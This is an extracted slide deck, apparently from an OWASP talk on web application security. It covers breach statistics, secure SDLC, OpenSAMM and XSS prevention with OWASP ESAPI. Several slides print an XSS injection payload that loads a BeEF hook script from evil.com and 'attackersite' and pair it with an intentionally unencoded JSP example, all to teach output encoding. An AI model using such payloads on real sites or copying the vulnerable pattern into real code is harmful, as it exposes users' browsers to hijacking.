  • Evidence of Attacks• Reports vary, but most recent ones agree that more than 80% of attacks perpetrated today are against web applications.• 7Safe (UK Security Breach Investigations Report) – “in 86% of all attacks, a weakness in a web interface was exploited”• Privacy Rights Clearinghouse – “In 2009, 93% of all data breaches ... concerned compromised databases or applications.”
  • Verizon DBIR 2010• Latest Verizon Data Breach Investigations Report (for 2010): – Who is behind data breaches? - 92% stemmed from external agents – How do breaches occur? - 50% utilised some form of hacking – What commonalities exist? - 96% of attacks were not highly difficult• Where should mitigation efforts be focused? – Eliminate unnecessary data; keep tabs on what’s left – Ensure essential controls are met – Check the above again – Assess remote access services – Test and review web applications – Audit user accounts and monitor privileged activity – Monitor and mine event logs – Examine ATMs and other payment card input devices for tampering
  • How prevalent are attacks?• July 2012 study: more than 50% of responding companies experienced at least one app sec breach in previous 18 month period• For many, loss > $500k per incident• Key findings: – Application security incidents are common and have severe consequences. – Many organisations still struggle with the most basic security flaws. – Most organisations do not have a holistic or strategic approach to application security. – Application development and security teams and goals are often not aligned for optimised results.
  • Some scary graphs...
  • Other App Sec Drivers• Good civic hygiene (a la Phil Zimmermann, PGP & Zfone) – PZ on why we need to encrypt VOIP: “Phone calls are moving from the well-manicured neighbourhood of the PSTN to the urban blight of the Internet. We must encrypt VOIP - it’s part of good civic hygiene.” – Similarly, business processes are moving from the well-manicured neighbourhood of the front office to web apps located in the urban blight of the Internet. Properly securing web apps is part of good civic hygiene.• Compliance (e.g. PCI DSS)• New Companies Act• PPI Bill• Basel II• King III
  • NetSec is Still the Darling• InfoSec spending is missing the target (yesterday’s war).• White Hat / Imperva survey (April 2010) – “only 18% of IT security budgets were allocated to address the threat posed by insecure Web applications”• But, as we’ve seen, the majority of attacks today are against software applications.• Why are organisations still spending majority of InfoSec budget on network / infrastructure? – Force of habit / budget inertia Application – “Best practise” Presentation – Compliance Session – OSI stack-approach to security (hence WAFs) Transport Network – Software security is perceived to be hard Data Link Physical
  • Think Different• Software security can no longer be ignored• But it is a different problem to net / inf sec. – Lego vs Clay• Firewalls still need to allow access to :80 or :443.• Software is like clay - has many degrees of freedom – great for creating all sorts of desired features – but often the process of building software systems results in all sorts of undesired features, including security vulnerabilities
  • Expectation vs Reality• So clearly, developers need to write more secure code BY THE WAY, YOUR CODE• But why would they do this if IS SECURE, ISN’T IT? they are measured only on how fast they deliver business features?• Developers don’t attend security conferences - they’re back at the office churning out features• Your software developers are your most important security resource!
  • Rugged Software Manifesto• ruggedsoftware.org
  • Security Training
  • Security in the spec• Security is about incentives (Ross Anderson)• Developers need to be measured on the security of their code• To do this fairly, it cannot be done in an ad-hoc fashion - developers need to fulfil security requirements just like they do feature requirements• Security requirements must be part of the spec of each system• Build security in – start by creating explicit security requirements in your specifications
  • The Quality Lever Source: Borland• Applies equally to security
  • Security Requirements• Take measures to avoid security bugs – OWASP Top-10 & Dev Guide – Frameworks – Tools• Take measures to reduce security design flaws – In the requirements process: • business analysis produces feature requirements • do risk analysis on business requirements to drive out security requirements - if the BA is not a security expert, get your ISO or an expert consultant to help.
  • Security in the Design• Security feature design is important and hard to get right.
  • What’s the password?
  • Drivers for Security Requirements• Business needs – functional needs of the business processes implemented in the app (e.g. data access permissions, forgot password process)• Risk analysis – threat modelling, vulnerability analysis, abuse cases – attack trees, STRIDE, DREAD – involve the business owners to discover severity of each type of loss – involve your ISO• Regulatory demands – PPI – SAS 70 – ECT Act – FIPS (crypto)
  • Secure SDLC• Weave a thread of security through each phase of your SDLC: – Requirements – Design – Construction – Testing – Deployment – Operations – Decommissioning• Security touches all aspects of an SDLC and must be reasonably spread over the process.
  • Security Activities in SDLC• Typical security activities in a Secure SDLC include: – Source Code Protection – Fuzzing – Threat Modelling – Security Requirements Template – Static Analysis – Dynamic Analysis – Security Enriched Code Libraries – Automated Penetration Testing – Training – Security Code Review – Manual Penetration Test – Final Security Review/Audit
  • Software Assurance Program• OpenSAMM (Software Assurance Maturity Model)• An OWASP Project• Drivers for a maturity model: – An organisation’s behaviour changes slowly over time OWASP • Changes must be iterative while working toward long-term goals – There is no single recipe that works for all organisations • A solution must enable risk-based choices tailor to the organisation – Guidance related to security activities must be prescriptive • A solution must provide enough details for non-security-people – Overall, must be simple, well-defined, and measurable
  • SAMM Business Functions• Start with the core activities tied to any organisation !"#$%&&($ performing software development. !"#$%&(%)"#• Named generically, but should resonate with any developer or manager. !"#$%&($)* !"#$%&"()
  • SAMM Security Practices• From each of the Business Functions, 3 Security Practices are defined.• The Security Practices cover all areas relevant to software security assurance.• Each one is a ‘silo’ for improvement.
  • Under each Security Practice• Three successive Objectives under each Practice define how it can be improved over time. – This establishes a notion of a Level at which an organisation fulfils a given Practice.• The three Levels for a Practice generally correspond to: – (0: Implicit starting point with the Practice unfulfilled) – 1: Initial understanding and ad hoc provision of the Practice – 2: Increase efficiency and/or effectiveness of the Practice – 3: Comprehensive mastery of the Practice at scale
  • SAMM Roadmap• To make the “building blocks” usable, SAMM defines Roadmaps templates for typical kinds of organisations: – Independent Software Vendors – Online Service Providers – Financial Services Organisations – Government Organisations
  • SAMM Re-cap• Evaluate an organisations existing software security practices.• Build a balanced software security assurance program in well-defined iterations.• Demonstrate concrete improvements to a security assurance program.• Define and measure security-related activities throughout an organisation.
  • Institutionalise App Sec• Your ISMS demands it - e.g. ISO 27001/2: – 10.9: Electronic commerce services – 11.6: Application and information access control – 12: Information systems acquisition, development and maintenance• Create a software assurance programme to address these – OpenSAMM, BSI-MM, Microsoft SDL• Weave a thread of security through your SDLC.• At very least, put security requirements in your specs & give your development teams the three T’s :) – Training (consultants can help) – Tools (lots of excellent free tools available) – Time (to get to grips with their role in security - most devs not exposed - flaw in dev education at uni, tech etc.)
  • App Sec in Context
  • App Sec in Context Secure Coding Dev Guide
  • App Sec in Context Secure SDLC Secure Coding Dev Guide Agile (Scrum)
  • App Sec in Context Software Assurance Programme Secure SDLC Secure Coding Dev Guide Agile (Scrum) OpenSAMM
  • App Sec in Context ISMS Software Assurance Programme Secure SDLC Secure Coding Dev Guide Agile (Scrum) OpenSAMM ISO 27001
  • How do I start?• Medium to long-term – establish a formal software assurance programme (e.g. OpenSAMM).• Today – put security requirements in your specs – start with generic risk-based requirements, e.g. OWASP Top-10 – find/appoint a champion (with authority) who will oversee this
  • Software Development• Software Development Life-Cycle
  • Software Development• Software Development Life-Cycle – Coding – Deployment
  • Software Development• Software Development Life-Cycle – Coding – Deployment – Maintenance – Disposal
  • Software Development• Software Development Life-Cycle – Design – Coding – Deployment – Maintenance – Disposal
  • Software Development• Software Development Life-Cycle – Design – Coding – Testing – Deployment – Maintenance – Disposal
  • Software Development• Software Development Life-Cycle – Requirements – Design – Coding – Testing – Deployment – Maintenance – Disposal
  • Software Development• Software Development Life-Cycle – Requirements – Design – Coding – Testing Key to – Deployment success – Maintenance – Disposal
  • Software DevelopmentSecure • Software Development Life-Cycle – Requirements – Design – Coding – Testing Key to – Deployment success – Maintenance – Disposal
  • Secure SDLC• Secure Software Development Life-Cycle – Secure Requirements – Secure Design – Secure Coding – Secure Testing – Secure Deployment – Secure Maintenance – Secure Disposal
  • Secure SDLC• Secure Software Development Life-Cycle – Secure Requirements – Secure Design – Secure Coding – Secure Testing K ey to – Secure Deployment Se cu r i ty – Secure Maintenance – Secure Disposal
  • Security Requirements• Change your organisation – Executive buy-in – Implement S-SDLC• Steps to develop Requirements – Engage with Client / Business Partner – Identify Policies and Standards – Identify Regulatory, Compliance, and Privacy Requirements – Develop CIA Objectives – Develop Procurement Requirements – Perform Risk Assessment
  • Security Requirements• Change your organisation What’s the – Executive buy-in – Implement S-SDLC problem?• Steps to develop Requirements – Engage with Client / Business Partner – Identify Policies and Standards – Identify Regulatory, Compliance, and Privacy Requirements – Develop CIA Objectives – Develop Procurement Requirements – Perform Risk Assessment
  • Security Requirements• Change your organisation What’s the – Executive buy-in – Implement S-SDLC problem?• Steps to develop Requirements – Engage with Client / Business Partner – Identify Policies and Standards – Identify Regulatory, Compliance, and Privacy Requirements – Develop CIA Objectives – Develop Procurement Requirements – Perform Risk Assessment
  • Security Requirements• Change your organisation What’s the – Executive buy-in – Implement S-SDLC problem?• Steps to develop Requirements – Engage with Client / Business Partner – Identify Policies and Standards – Identify Regulatory, Compliance, and Privacy Requirements – Develop CIA Objectives – Develop Procurement Requirements – Perform Risk Assessment
  • What now?• There is hope :)• All that you need is available – Information – Tools – Techniques – Training – Plan• You can make a big difference
  • OWASP Top 10 OWASP Open Web Application Security Project• OWASP has tools and resources to help• Get the Top 10 – http://www.owasp.org/index.php/Top_10
  • OWASP Top 10 OWASP Open Web Application Security Project Next• OWASP has tools and resources to help Step• Get the Top 10 – http://www.owasp.org/index.php/Top_10
  • Top 10 - Fix these
  • Top 10 - Fix theseStart by doing these!
  • Top 10 - Fix theseStart by doing these!
  • Top 10 - XSS
  • Top 10 - XSSRead t h is
  • Top 10 - XSSRead t h is Get the C heat Sheet
  • XSS Cheat Sheet• Implement the XSS Prevention Rules – Never Insert Untrusted Data Except in Allowed Locations – Encode before Inserting Untrusted Data into • HTML Element Content • HTML Common Attributes • JavaScript Data Values • Style Property Values • URL Parameter Values – Validate/Clean User-driven HTML – Prevent DOM-based XSS 39
  • XSS Cheat Sheet• Implement the XSS Prevention Rules – Never Insert Untrusted Data Except in Allowed Locations – Encode before Inserting Untrusted Data into • HTML Element Content • HTML Common Attributes • JavaScript Data Values • Style Property Values • URL Parameter Values – Validate/Clean User-driven HTML – Prevent DOM-based XSS 39
  • Escaping JS Data• JavaScript Encode Before Inserting Untrusted Data into HTML JavaScript Data Values – inside quoted string <script>alert(ENCODE UNTRUSTED DATA)</script> – one side of quoted expression <script>x=ENCODE UNTRUSTED DATA</script> – inside quoted event handler <div onmouseover="x=ENCODE UNTRUSTED DATA"></div> 40
  • Unsafe Code• JSP Source<% /** name gets set to:Jim);"><script src=http://evil.com/beef/hook/beefmagic.js.php></script><"**/ String name = request.getParameter("name");%><body onload="alert(Hello <%=name%>);">• Generated HTML<body onload="alert(Hello Jim);"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><");"> 41
  • Unsafe Code u ntru sted• JSP Source d ata<% /** name gets set to:Jim);"><script src=http://evil.com/beef/hook/beefmagic.js.php></script><"**/ String name = request.getParameter("name");%><body onload="alert(Hello <%=name%>);">• Generated HTML<body onload="alert(Hello Jim);"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><");"> 41
  • Unsafe Code u ntru sted• JSP Source d ata<% /** name gets set to:Jim);"><script src=http://evil.com/beef/hook/beefmagic.js.php></script><"**/ String name = request.getParameter("name"); no enco d ing!%><body onload="alert(Hello <%=name%>);">• Generated HTML<body onload="alert(Hello Jim);"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><");"> 41
  • Unsafe Code u ntru sted• JSP Source d ata<% /** name gets set to:Jim);"><script src=http://evil.com/beef/hook/beefmagic.js.php></script><"**/ String name = request.getParameter("name"); no enco d ing!%><body onload="alert(Hello <%=name%>);"> XSS• Generated HTML inje ction<body onload="alert(Hello Jim);"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><");"> 41
  • Security Control• What should the Control do? – Encode unsafe data – Prevent switching out of the data value context • into the script context • into or into another attribute.• How? – Allow Alphanumeric characters – Encode chars < 256 using the xHH format – Encode chars >= 256 using the uHHHH format – Don’t use shortcuts like " t n – HTML parser runs before JS parser, e.g. </script> inside quotes 42
  • Selecting a Control• Think carefully before rolling your own – May introduce new vulnerabilities – May not work correctly – Don’t reinvent the wheel• Your Framework is your friend – Tapestry/Spring/Cake/Symfony – But verify the implementation first!• Microsoft SDL – http://antixss.codeplex.com• OWASP Enterprise Security API – ESAPI – Java and PHP 43
  • OWASP’s ESAPI• Enterprise Security API – by OWASP• Set of foundational security controls• Integrated with each other• BSD license• Major security firm did line-by-line code review• Get there faster and cheaper• Includes Intrusion Detection Framework – Wire this do the inner workings of your app – Security Logs – WAF with custom rules 44
  • Safe Code (with ESAPI)• JSP Source<% /** name gets set to:Jim);"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><"**/ String name = request.getParameter("name"); String safe = ESAPI.encoder().encodeForJavaScript(name);%><body onload="alert(Hello <%=safe%>);">• Produced HTML<body onload="alert(Hello Jimx27x29x3Bx22x3Ex3Cscriptx20srcx3Dhttpx3Ax2Fx2Fattackersitex2Fbeefx2Fhookx2Fbeefmagic.js.phpx3Ex3Cx2Fscriptx3Ex3Cx22x27);"> 45
  • Safe Code (with ESAPI)• JSP Source<% /** name gets set to:Jim);"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><"**/ String name = request.getParameter("name"); String safe = ESAPI.encoder().encodeForJavaScript(name);%><body onload="alert(Hello <%=safe%>);">• Produced HTML<body onload="alert(Hello Jimx27x29x3Bx22x3Ex3Cscriptx20srcx3Dhttpx3Ax2Fx2Fattackersitex2Fbeefx2Fhookx2Fbeefmagic.js.phpx3Ex3Cx2Fscriptx3Ex3Cx22x27);"> 45
  • Safe Code (with ESAPI) untrus te d• JSP Source data<% /** name gets set to:Jim);"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><"**/ String name = request.getParameter("name"); String safe = ESAPI.encoder().encodeForJavaScript(name);%><body onload="alert(Hello <%=safe%>);">• Produced HTML<body onload="alert(Hello Jimx27x29x3Bx22x3Ex3Cscriptx20srcx3Dhttpx3Ax2Fx2Fattackersitex2Fbeefx2Fhookx2Fbeefmagic.js.phpx3Ex3Cx2Fscriptx3Ex3Cx22x27);"> 45
  • Safe Code (with ESAPI) untrus te d• JSP Source data<% /** name gets set to:Jim);"><script src=http://attackersite/beef/hook/ proper enco d ingbeefmagic.js.php></script><"**/ String name = request.getParameter("name"); String safe = ESAPI.encoder().encodeForJavaScript(name);%><body onload="alert(Hello <%=safe%>);">• Produced HTML<body onload="alert(Hello Jimx27x29x3Bx22x3Ex3Cscriptx20srcx3Dhttpx3Ax2Fx2Fattackersitex2Fbeefx2Fhookx2Fbeefmagic.js.phpx3Ex3Cx2Fscriptx3Ex3Cx22x27);"> 45
  • Safe Code (with ESAPI) untrus te d• JSP Source data<% /** name gets set to:Jim);"><script src=http://attackersite/beef/hook/ proper enco d ingbeefmagic.js.php></script><"**/ String name = request.getParameter("name"); String safe = ESAPI.encoder().encodeForJavaScript(name);%> safe<body onload="alert(Hello <%=safe%>);">• Produced HTML rend ering<body onload="alert(Hello Jimx27x29x3Bx22x3Ex3Cscriptx20srcx3Dhttpx3Ax2Fx2Fattackersitex2Fbeefx2Fhookx2Fbeefmagic.js.phpx3Ex3Cx2Fscriptx3Ex3Cx22x27);"> 45
  • Safe Code (with ESAPI)• JSP Source<% /** name gets set to:Jim);"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><"**/ String name = request.getParameter("name"); String safe = ESAPI.encoder().encodeForJavaScript(name);%><body onload="alert(Hello <%=safe%>);">• Produced HTML<body onload="alert(Hello Jimx27x29x3Bx22x3Ex3Cscriptx20srcx3Dhttpx3Ax2Fx2Fattackersitex2Fbeefx2Fhookx2Fbeefmagic.js.phpx3Ex3Cx2Fscriptx3Ex3Cx22x27);"> 45
  • More ESAPI• JSP Source where’s the input<% /** name gets setto: vali dation?Jim);"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><"**/ String name = request.getParameter("name"); String safe = ESAPI.encoder().encodeForJavaScript(name);%><body onload="alert(Hello <%=safe%>);">• Produced HTML<body onload="alert(Hello Jimx27x29x3Bx22x3Ex3Cscriptx20srcx3Dhttpx3Ax2Fx2Fattackersitex2Fbeefx2Fhookx2Fbeefmagic.js.phpx3Ex3Cx2Fscriptx3Ex3Cx22x27);"> 46
  • More ESAPI where’s the input vali dation?String name = request.getParameter("name");String safe = ESAPI.encoder().encodeForJavaScript(name); 46
  • More ESAPIString name = request.getParameter("name");String safe = ESAPI.encoder().encodeForJavaScript(name); 46
  • Input ValidationValidator validator = ESAPI.validator();try { String name = validator.getValidInput(context, request.getParameter("name"), CLIENT_RE,16,false); String safe = ESAPI.encoder().encodeForJavaScript(name); //normal workflow} catch (ValidationException x) { // report input failure to user} 47
  • Input ValidationValidator validator = ESAPI.validator(); vali dtry { ate String name = validator.getValidInput(context, request.getParameter("name"), input CLIENT_RE,16,false); String safe = ESAPI.encoder().encodeForJavaScript(name); //normal workflow} catch (ValidationException x) { // report input failure to user} 47
  • Input ValidationValidator validator = ESAPI.validator(); vali dtry { ate String name = validator.getValidInput(context, request.getParameter("name"), input CLIENT_RE,16,false); String safe = ESAPI.encoder().encodeForJavaScript(name); //normal workflow} catch (ValidationException x) { // report input failure to user} 47
  • Input ValidationValidator validator = ESAPI.validator(); vali dtry { ate String name = validator.getValidInput(context, request.getParameter("name"), input CLIENT_RE,16,false); String safe = ESAPI.encoder().encodeForJavaScript(name); //normal workflow} catch (ValidationException x) { // report input failure to user} 47
  • Input ValidationValidator validator = ESAPI.validator(); vali dtry { ate String name = validator.getValidInput(context, request.getParameter("name"), input CLIENT_RE,16,false); String safe = ESAPI.encoder().encodeForJavaScript(name); //normal workflow} catch (ValidationException x) { // report input failure to user} ESAPI: does security logg ing wakes up Intrusion Detection 47
  • Top 10 - DoneStart by doing these! 48
  • Top 10 - Done48
  • Top 10 - Done ESAPI Encoder API48
  • Top 10 - Done ESAPI Encoder, Validator APIs ESAPI Encoder API ESAPI Authenticator, User APIs ESAPI Access Ref Map, Access Ctrl APIs ESAPI HTTPUtils ESAPI Encryptor API ESAPI Access Control API ESAPI Security Wrapper Response48
  • Top 10 - Done ESAPI Encoder, Validator APIs ESAPI Encoder API ESAPI Authenticator, User APIs ESAPI Access Ref Map, Access Ctrl APIs ESAPI HTTPUtils ESAPI Encryptor API ESAPI Access Control API ESAPI Security Wrapper Response48
  • So what about risk #11?• You’re not done yet - the Top-10 is just the beginning• OWASP Top-10 - document references & additional risks references.• OWASP Development Guide – http://www.owasp.org/index.php/Category:OWASP_Guide_Project – 2005 version – Surprisingly still very valid – 2010 version under development• CWE / SANS Top 25 – http://cwe.mitre.org/top25/index.html• WASC – http://projects.webappsec.org/Threat-Classification – http://projects.webappsec.org/Threat-Classification-Taxonomy-Cross-Reference-View
  • OWASP Thank You! Questions?www.owasp.org www.thinksmart.co.za